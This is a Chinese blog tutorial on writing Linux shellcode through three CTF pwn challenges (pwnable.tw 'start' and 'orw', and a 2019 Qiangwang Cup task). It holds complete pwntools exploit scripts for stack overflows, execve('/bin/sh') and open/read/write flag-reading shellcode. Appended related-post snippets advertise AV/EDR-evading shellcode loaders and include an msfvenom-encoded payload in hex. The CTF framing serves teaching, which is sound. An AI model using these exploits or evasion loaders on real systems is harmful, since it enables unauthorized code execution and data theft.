shellcode执行盒_简单shellcode学习

最新推荐文章于 2024-04-20 09:39:50 发布
最新推荐文章于 2024-04-20 09:39:50 发布
阅读量158 收藏
点赞数
文章标签: shellcode执行盒
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39849127/article/details/111583433
版权

85a3ea5e466d80ac416f49c71a8f3320.png

本文由“合天智汇”公众号首发 作者:hope

引言

之前遇到没开启NX保护的时候,都是直接用pwtools库里的shellcode一把梭,也不太懂shellcode代码具体做了些什么,遇到了几道不能一把梭的题目,简单学习一下shellcode的编写。

前置知识

  • NX(堆栈不可执行)保护
  • shellcode(一段16进制的数据,转化为字符串则为汇编代码)

pwnable之start

保护检测

可以看到这道题目什么保护都没有开

e3b158fa6b23a60068f23ca7a5d9d806.png

ida分析

题目只有start函数,可以知道该题是用汇编语言写的,顺便可以锻炼一下自己看汇编的能力

0f93ed9f8fc8a3e736a507858d41156f.png

汇编代码分析

简单来说,程序调用了wirte函数去打印字符,接着调用read函数输入,但是这里的输入没有限制,因此有一个栈溢出的漏洞,而且程序有个特定,他将esp的值首先压入了栈中,esp存的是栈顶的地址,使得我们能够找到栈的地址,为我们返回shellcode做准备

push    esp         #将esp寄存器的值压入栈中,这里可以获得栈的地址
push    offset _exit #将_exit函数地址压入栈中,使得start函数执行完毕时返回exit函数
xor     eax, eax     #清空eax寄存器的值
xor     ebx, ebx     #清空ebx寄存器的值
xor     ecx, ecx     #清空ecx寄存器的值
xor     edx, edx     #清空edx寄存器的值
push    3A465443h
push    20656874h
push    20747261h
push    74732073h
push    2774654Ch       #压入一堆字符串,即程序运行时的字符串,Let's start the CTF:
mov     ecx, esp        ; addr,将字符串的地址放入ecx寄存器中
mov     dl, 14h         ; len,将打印长度放进dl寄存器中,即16位寄存器
mov     bl, 1           ; fd,1为文件描述符,指的是屏幕
mov     al, 4           #eax寄存器,存放的是调用号,4调用号即,write函数
int     80h             ; LINUX - sys_write,int 0x80调用80中断
xor     ebx, ebx        #清空ebx寄存器,0为文件描述符,即外部输入,例如键盘
mov     dl, 3Ch         #输入的长度 0x3c
mov     al, 3           #3调用号,即read函数
int     80h             ; LINUX -
add     esp, 14h        #恢复栈平衡,因为压入字符串消耗了0x14的栈空间,使用完毕后需要换远
retn                    #返回

函数调用表

42d61dda252d7f4ba12e42a1acbfa8d6.png

思路

  • 程序开始将esp的值压入栈中,可以获得栈的地址
  • 由于程序没有限制输入,因此有栈溢出漏洞,可以修改程序执行的流程

获得栈地址

根据程序的流程,我们可以画出栈的情况

a4599327f7ea80a90d0924e6b1a63ad7.png

跟踪调试一下,跟我们预期的一样

f9c59f14ca76f7a4b375b1b9ae3232bc.png

继续跟踪直到程序运行完add esp,14h,查看一下栈结构

733d96f18dc9ce5bb67b07758867f357.png

此时返回地址指向exit函数,在执行完ret指令后,esp寄存器内容就为栈地址,想要泄露栈地址,则需要将返回地址修改为write函数,那么具体返回到哪个地址我们继续分析。

可以看到0x4调用前,需要往相应的寄存器传入相应的参数,其中ecx寄存器就是用于指向需要打印字符串的起始地址。

mov     ecx, esp        ; addr,将字符串的地址放入ecx寄存器中
mov     dl, 14h         ; len,将打印长度放进dl寄存器中,即16位寄存器
mov     bl, 1           ; fd,1为文件描述符,指的是屏幕
mov     al, 4           #eax寄存器,存放的是调用号,4调用号即,write函数
int     80h             ; LINUX - sys_write,int

在执行完ret指令后,此时的esp寄存器的内容恰好指向栈顶的地址

0xffffd12c —▸ 0xffffd130
#因为push esp,会使得esp的值减4,因此此时的esp指针指向的内容是旧的esp指针,这点需要注意

0ac76227ecc3fb463cb3fff59db648f7.png

因此只要将返回地址修改为mov ecx,esp的地址即可打印出栈的地址

sh.recvuntil("Let's start the CTF:")
payload = 'a'*20 + p32(0x8048087)#mov ecx,esp的地址
#attach(sh)
sh.send(payload)
esp = u32(sh.recv(4))
print 'esp:'+hex(esp)

返回栈地址,执行shellcode

由于程序没有开启NX保护,即栈空间里的数据是可以执行的,那么我们输入execve()函数调用的汇编代码,即可执行getshell

762d7431bb7f2f59669d4b0f44fd416d.png

shellcode

c语言表示:execve("/bin/shx00",0,0)
汇编代码:
mov eax,0xb #将调用号设置为0xb,即函数execve的调用号
xor edx,edx #清空edx寄存器,因为execve的函数edx的值为0
xor ecx,ecx #清空ecx寄存器,因为execve的函数ecx的值为0
push 0x0068732f #x00hs/
push 0x6e69622f #nib/,小端模式需要反着压入栈中
mov ebx,esp #将字符串的地址传递给ebx
int 0x80 #调用80中断
16进制表示:
利用pwntools库里的asm()函数,将汇编代码以16进制的表示形式输入

可以看到简单的shellcode编写需要对照着系统调用号的表,挑取你需要的函数,然后对照着表将参数输入到对应的寄存器,继而调用80中断实现调用函数。

payload1 = 'a'*20+p32(esp+20)#该返回地址需要自己去调试看看自己shellcode的起始地址,算出与泄露出的栈顶地址的偏移即可
payload = asm("mov eax,0xb")
payload += asm("xor edx,edx")
payload += asm("xor ecx,ecx")
payload += asm("push 0x0068732f")
payload += asm("push 0x6e69622f")
payload += asm("mov ebx,esp")
payload += asm("int 0x80")
sh.send(payload1+payload)

完整的exp

from pwn import *

context(arch='i386',os='linux')
sh = process("./start")
#sh = remote("node3.buuoj.cn",29479)
sh.recvuntil("Let's start the CTF:")
payload = 'a'*20 + p32(0x8048087)
#attach(sh)
sh.send(payload)
esp = u32(sh.recv(4))
print 'esp:'+hex(esp)
payload1 = 'a'*20+p32(esp+20)
payload = asm("mov eax,0xb")
payload += asm("xor edx,edx")
payload += asm("xor ecx,ecx")
payload += asm("push 0x0068732f")
payload += asm("push 0x6e69622f")
payload += asm("mov ebx,esp")
payload += asm("int 0x80")
sh.send(payload1+payload)
sh.interactive()

pwnable之orw

保护检测

开启了canary保护,存在可写并且可执行的区域

6b8ff74b091d7c50169e91edc395c7b6.png

ida分析

orw_seccomp

在该函数里开启了沙盒,这里可以用seccomp-tools去看下沙盒禁用了什么函数

6d36636818b89700220df49e657184c7.png

工具下载:https://github.com/david942j/seccomp-tools

可以看到,当用i386机器运行此程序时,只允许使用rt_sigreturn,sigreturn,exit_group,open,read,write的系统调用,我们常用的execve调用是不允许被使用的

d98fcfea281c83d205daab4502bbe110.png

看一下题目描述,告诉我们flag位于/home/orw/flag处,而且只允许使用openread,write的系统调用,这是因为其他系统调用被prtcl函数所禁用了,这里我们关注在于shellcode,prctl则在后面的文章会详细介绍。

0c3204c5a442011668c25dc305223493.png

main函数

名为shellcode的变量位于.bss段,在输入完毕后会将该变量以函数的形式调用,则这道题不需要去寻找shellcode的返回地址,直接输入一段shellcode即可

75bceba9a284d7a0a6966d0263cb7a00.png

思路

  • 首先程序禁用了execve系统调用,只开放了openread,以及write的系统调用,意义很明确,是让我们将flag都出来,而不是取得目标机器的shell

shellcode的编写

在写shellcode前,我们可以先用c语言将读flag的伪代码写出来

c语言

fd = open("/home/orw/flag","w");//首先打开文件
read(fd,buf,0x20);//读取文件的信息,放入到局部变量buf中
write(1,buf,0x20);//将变量buf的内容打印出来,这里的足够打印出flag的长度即可,由于不知道flag的具体长度可以设置为长一点

691796e09649c71c0917dff93a9e0a1f.png

shellcode

#首先对照伪C代码以及系统调用表进行shellcode的编写
fd = open("/home/orw/flag","w")
#相应的汇编
xor ecx,ecx #清空ecx寄存器,open的调用该寄存器的值设为null
xor edx,edx #清空edx寄存器,open的调用该寄存器的值设为null
mov eax,0x5 #调用号设置为5
push 0x006761 #将/home/orw/flag压入栈中,注意是栈是先进后出,因此字符串需要从最末尾开始压入即将字符
push 0x6c662f77 #转为16进制要反向排序,并且字符串需要添加截断符x00,push要以4字节为单位。
push 0x726f2f65
push 0x6d6f682f
mov ebx,esp #fd的值为路径的地址
int 0x80 #调用80中断,实现系统调用

#c语言
read(fd,buf,0x20)或read(3,buf,0x20)#这里的3为其他文件描述符,下面会详细介绍
#相应的汇编
mov eax,0x4
mov ebx,0x3 #这里用3代替了oepn返回的fd指针,因为3可以用作于打开文件时的文件描述符,若想用open返回的指针则应该将系统调用号移动到eax寄存器前,先保存eax的内容。
mov ecx,esp #将esp作为临时变量buf的地址
mov edx,0x20 #读入的长度为0x20
int 0x80 #调用80中断,实现系统调用

#c语言
write(1,buf,0x20)
#相应的汇编
mov eax,0x3#系统调用号0x3
mov ebx,0x1#文件描述符为1,指向屏幕
mov ecx,esp #将esp作为临时变量buf的地址
mov edx,0x20 #打印的字符串的长度
int 0x80 #调用80中断,实现系统调用

#这里可以用pwntools库的一个函数代替,shellcraft
c语言:open("/home/orw/flag") <==> 汇编:asm(shellcraft.open("/home/orw/flag"))
c语言:read(3,buf,0x20)<==> 汇编:asm(shellcraft.read(3,"esp",0x20)
c语言:write(1,buf,0x20)<==>汇编:asm(shellcraft.write(1,"esp",0x20))

文件描述符

内核(kernel)利用文件描述符(file descriptor)来访问文件。文件描述符是非负整数。打开现存文件或新建文件时,内核会返回一个文件描述符。读写文件也需要使用文件描述符来指定待读写的文件。(来自百度百科)

  • 0代表标准输入流,stdin
  • 1代表标准输出流,stdout
  • 2代表标准错误流,stderr
  • 当打开一个新的文件时,它的文件描述符为3

exp1

from pwn import *
context(log_level='debug',arch='i386',os='linux')
#sh = remote("node3.buuoj.cn",29479)
sh = remote("chall.pwnable.tw",10001)
sh.recvuntil("shellcode:")

payload = asm(shellcraft.open("/home/orw/flag"))
payload += asm(shellcraft.read(3,"esp",100))
payload += asm(shellcraft.write(1,"esp",100))
sh.sendline(payload)

sh.interactive()

exp2

from pwn import *

context(arch='i386',os='linux')
#sh = remote("node3.buuoj.cn",25212)
sh = remote("chall.pwnable.tw",10001)
sh.recvuntil("shellcode:")
payload = asm("xor ecx,ecx")
payload += asm("xor edx,edx")
payload += asm("mov eax,0x5")
payload += asm("push 0x006761")
payload += asm("push 0x6c662f77")
payload += asm("push 0x726f2f65")
payload += asm("push 0x6d6f682f")
payload += asm("mov ebx,esp")
payload += asm("int 0x80")

payload += asm("mov eax,0x3")
payload += asm("mov ebx,0x3")
payload += asm("mov ecx,esp")
payload += asm("mov edx,0x20")
payload += asm("int 0x80")

payload += asm("mov eax,0x4")
payload += asm("mov ebx,0x1")
payload += asm("mov ecx,esp")
payload += asm("mov edx,0x2")
payload += asm("int 0x80")

sh.sendline(payload)
sh.interactive()

2019广东强网杯线下题目

保护检测

同样是基本没开启防护,并且具有可写并可执行区域

bbe04dd932094d12b4522f3e7552c256.png

ida分析

main函数

程序有1,2,3,三个选择,选择1 时仅仅是打印一串无作用的字符串,选择2时会当挑战满足时会打印栈地址,选择3可以执行栈溢出漏洞

51588f9031d8b2b2e8803e2c5e7277e0.png

仅仅只有0x10的溢出空间,可以恰好覆盖返回地址

978e7b34484b9d2835e31226a5c02b9f.png

magic函数

当传入的参数a2的值等于305419896时,则打印a1的值

649372c5f4181a0682c352e7ce97f6a3.png

我们可以看下magic函数传入的两个变量,一个为buf的地址,一个为局部变量v11v11的值可以通过buf溢出后修改

53018410ecf45936195c527827b5230c.png

思路

  • 程序存在栈溢出的漏洞,但是溢出的字节数较少,只能刚好溢出返回地址
  • 程序可以利用栈溢出覆盖变量v11的值,从而泄露buf的地址
  • 这道题我们用另一种思路,在栈上写栈转移的汇编代码,将栈转移到.bss段中,在向.bss段写入shellcode,需要注意的是该题是64位,而64位的系统调用号与32位不同。

21bcd4c1dd3dedc4ffa9a0878670f213.png

汇编代码分析

payload = asm("mov rax,0;") #系统调用号
payload += asm("mov rdi,0;")#文件描述符
payload += asm("mov rsi,0x601080")#.bss段地址,用于buf地址
payload += asm("mov rdx,0x40")#输入长度
payload += asm("syscall")#syscall启动调用
payload += asm("push 0x601080")#返回地址
payload += asm("ret")#ret指令返回任意地址
payload = payload.ljust(0x38,'b')
payload += p64(addr)

完整的exp

from pwn import *
context(log_level='debug',arch='amd64',os='linux')
sh = process("./pwn")
sh.recvuntil(" your choice:")
sh.sendline("3")
sh.recvuntil("What?")
payload = 'a'*0x28+p64(305419896)
sh.send(payload)
sh.recvuntil(" your choice:")
sh.sendline("2")
sh.recvuntil("It is magic: [")
addr = int(sh.recv(14),16)
print 'addr:'+hex(addr)
sh.sendline("3")
sh.recvuntil("What?")
payload = asm("mov rax,0;")
payload += asm("mov rdi,0;")
payload += asm("mov rsi,0x601080")
payload += asm("mov rdx,0x40")
payload += asm("syscall")
payload += asm("push 0x601080")
payload += asm("ret")
payload = payload.ljust(0x38,'b')
payload += p64(addr)
#attach(sh)
sh.send(payload)
payload = asm("mov eax,59") #调用59号系统调用,execve("/bin/sh",0,0);
payload += asm("xor rsi,rsi")
payload += asm("xor rdx,rdx")
payload += asm("mov rdi, 0x6010a8")
payload += asm("syscall")
payload = payload.ljust(0x28,'x00')
payload += '/bin/shx00'
attach(sh)
sh.send(payload)
sh.interactive()

总结

  • shellcode的编写的需要借助调用表,根据调用表的参数值,往对应的寄存器赋值
  • start例题学会常用的系统调用execve("/bin/sh",0,0)的编写
  • orw例题则学会读给定路径的内容,从而学习open,read,write系统调用的编写
  • 广东强网杯这题则灵活利用栈可执行的条件,使用汇编实现栈转移,以及往指定地址写入内容。

shellcode原理

https://www.hetianlab.com/expc.do?ec=ECIDa5cd-1210-4eaf-a9bb-6256a5624bc2

(shellcode是一段用于利用软件漏洞而执行的代码,可在有能力劫持指令寄存器后,在内存中塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。)

声明:笔者初衷用于分享与普及网络知识,若读者因此作出任何危害网络安全行为后果自负,与合天智汇及原作者无关!

weixin_39849127
关注
一个简单ShellCode执行器&代码(just for fun)
HingC~
11-13 3372
最近看到有个问题:如何做到在程序运行时读入并执行一段代码 这是很容易做到的,能够运行是因为冯·诺依曼结构中程序和数据并没有本质区别. 其实完全没有必要读入代码运行,动态链接库完全可以胜任这方面的需求 在运行时读入代码并执行其实是完全可行的,脚本语言更容易做到,当然了C/C++也可以,写个解释器吧 考虑最简单的情况,何为代码?机械码算不算代码呢?当然算啦 我们先观察一下代码是怎
shellcode 执行
01-04
//msfvenom -p windows/exec CMD=calc.exe -f exe -e x86/shikata_ga_nai -i 6 -f c 生成shellcod 测试数据: bf6e4a2508d9ebd97424f45d33c9b131317d13037d1383c56aa8d0f49aae1b055acf92e06bcfc161dbff8224d774c6dc6cf8cfd3c5b729ddd6e40a7c54f75e5e6538939fa2255ecd7b21cde2087fce894291566d1290772029cb57c2fe67dedce342a857d7392bbe26c180ff8730d8382fabaf304c56a8862f8c3d1d9747e5f9268b70892460f6d52877db6d54fcdaa1dd46f965861d603f62f39d5fcdac3b2be3b93176693fc70cdf3fd70e4f28e685002ff74f65cf155a9378800f1ee533fa5c10b00f1ce7a86519a36e9553bc1a99c0bd0efa872dd2d322d6712c 将shellcode作为参数传入执行,./shllcode_Argv.exe bf6e4a2508d9ebd97424f45d33c9b131317d13037d1383c56aa8d0f49aae1b055acf92e06bcfc161dbff8224d774c6dc6cf8cfd3c5b729ddd6e40a7c54f75e5e6538939fa2255ecd7b21cde2087fce894291566d1290772029cb57c2fe67dedce342a857d7392bbe26c180ff8730d8382fabaf304c56a8862f8c3d1d9747e5f9268b70892460f6d52877db6d54fcdaa1dd46f965861d603f62f39d5fcdac3b2be3b93176693fc70cdf3fd70e4f28e685002ff74f65cf155a9378800f1ee533fa5c10b00f1ce7a86519a36e9553bc1a99c0bd0efa872dd2d322d6712c 即可执行该段shellcode。 该exe可传vt查看报毒情况,无特征码
执行shellcode的几种方式
qq_41683305的博客
02-24 4904
首先写出汇编成功弹出计算器 #pragma comment(linker,"/section:.data,RWE") //data段可读写 #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") //不显示窗口 #pragma comment(linker,"/INCREMENTAL:NO") //指...
ShellcodeWrapper:优雅地封装与执行Shellcode
最新发布
gitblog_00098的博客
04-20 379
ShellcodeWrapper:优雅地封装与执行Shellcode 项目地址:https://gitcode.com/Arno0x/ShellcodeWrapper Shellcode是黑客或安全研究员在利用软件漏洞时常用的代码片段,它可以直接在目标进程中执行,以实现特定功能,如权限提升或数据窃取。然而,直接处理和运行Shellcode并非易事,这需要对底层系统操作有深入理解。为了解决这一问题,...
此源代码将生成 linux x86的 shellcode.rar_linux shellcode_shell
09-20
3. **处理限制**:考虑ASLR(地址空间布局随机化)、DEP(数据执行防护)等安全特性,确保shellcode能在受限环境中执行。 4. **编码和解码**:由于shellcode可能需要在网络传输中作为数据包的一部分,所以需要将其...
Android系统shellcode编写.zip_android_shellcode
09-23
1. **权限限制**:Android系统采用了安全模型,如Linux的用户权限和SELinux,使得在非root环境下执行shellcode变得更加困难。攻击者需要找到绕过这些限制的方法,例如利用系统漏洞提升权限。 2. **内存布局**:与PC...
pe_to_shellcode:将PE转换为Shellcode
05-09
同样,以一种方式修改PE文件的头,使您可以从头开始执行注入的缓冲区-就像使用shellcode一样。 它将自动找到存根,并继续加载完整的PE。 建物 下载最新。 克隆 使用递归克隆将存储库与所有子模块一起获取: git ...
CDL_shellcode_源码
10-02
在IT领域,Shellcode是一种特殊的低级代码,通常用汇编语言编写,用于利用软件漏洞执行任意命令。Shellcode在安全研究和逆向工程中扮演着重要角色,它可以直接在目标进程中运行,绕过安全机制,执行攻击者指定的操作...
C/C++ 远程ShellCode执行工具
热门推荐
CSDN
07-21 1万+
通过开发一组远程代码执行,可以动态实现对ShellCode代码的动态载入,由于ShellCode不存放在本地客户端常量区,所以在一定程度上可以减少被杀概率,客户端只保留之基本的Socket通信功能,当需要时才会加载恶意代码运行。此工具分为服务端与客户端,客户端可以将其加入到开机自启动列表,并传入响应的参数即可,目前支持TCP/UDP/HTTP三种协议传输,后期可能会增加ICMP等来实现后门的传输工作。
Shellcode执行工具编写思路(一)
Nocker888的博客
05-10 429
Shellcode执行工具编写思路 之前在MS08067实验室发过,我寻思着自己可以做个技术分析的公众号,写写文章分析给大家琢磨,也可以提升一下自己的技术。 这是一段C++加载器的代码,代码来自倾旋大佬的博客,先看大佬给的注释。 #include<Windows.h> //入口函数 intwmain(intargc,TCHAR*argv[]){ intshellcode_size=0;// shellcode长度 DWORDdwThreadId;//
让其他程序强行执行自己的 ShellCode【C++】
LiWeiHua01的博客
09-08 660
让其他程序执行自己的代码
投稿 | 初始ShellcodeShellcode执行工具编写思路
Ms08067安全实验室
04-19 506
文章来源|MS08067 公众号读者投稿本文作者:Arks7(Ms08067实验室读者)这是一段C++ 加载器的代码,代码来之倾旋大佬的博客,先看大佬给的注释。#include// 入口...
WIN7下可执行ShellCode
小神兵之技术篇
01-16 4313
#include #include int main() { byte shellcode[] = { 0xE9, 0x96, 0x00, 0x00, 0x00, 0x56, 0x31, 0xC9, 0x64, 0x8B, 0x71, 0x30, 0x8B, 0x76, 0x0C, 0x8B, 0x76, 0x1C, 0x8B, 0x46, 0x08, 0x8B, 0x7E, 0x
免杀!绕过EDR隐秘执行shellcode
潇湘信安的博客
06-22 372
Freeze.rs 是一个有效载荷创建工具,用于绕过 EDR 安全控制以隐秘方式执行 shellcode。Freeze.rs 利用多种技术,不仅可以删除 Userland EDR 挂钩,还可以以绕过其他端点监控控件的方式执行 shellcode
利用缓存区漏洞执行shellcode
qq_38919714的博客
02-03 1776
环境:win10 工具:vc++6 原理介绍:  栈溢出,C语言中gets()、strcpy()等函数未进行数据长度的限定,在栈内写入超出长度限制的数据,从而破坏程序运行甚至获得系统控制权的攻击手段。几个常见的寄存器,ebp栈底指针,esp栈顶指针,eip下一条计算机执行的指令,计算机中真正的存储方式如下图:   原理介绍:eip寄存器里存储的是CPU下次要执行的指令的地址。eip在内
【网络资源学习笔记】ShellCode相关内容学习
天在等我,菜鸟想飞
07-14 2683
个人shellcode相关网络资源学习记录
python免杀基础之shellcode调用
dzqxwzoe的博客
08-23 1387
shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。可在暂存器eip溢出后,塞入一段可让CPU执行shellcode机器码,让电脑可以执行攻击者的任意指令。(摘自百度)在windows中, 如果想要调用shellcode, 那肯定逃不过win32 api的调用, 如果会汇编的话那就另说了。那在这里介绍一下常用的API。函数需要查询MSDN去了解, 需要有点win32编程基础。
shellcraft新姿势
am_03的博客
09-01 1393
pwnable_orw exp 脚本 这道题的难度在于只能调用 open read 和 write ,学到了 shellcraft 新的使用方式 from pwn import * io = remote(‘node3.buuoj.cn’,25539) context.binary = ‘orw’ elf = ELF(‘orw’) shellcode = shellcraft.open(’/flag’) shellcode += shellcraft.read(‘eax’,‘esp’,100) shellc
深入学习缓冲区溢出:Shellcode编写技术解析
"这篇文档是关于shellcode编写技术和缓冲区溢出教程的个人学习记录,作者希望通过重新整理和打字来系统学习这一主题。文档源于《黑手缓冲区溢出教程》,并提醒读者尊重原作者,支持正版书籍。文中提到了作者自学缓冲...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值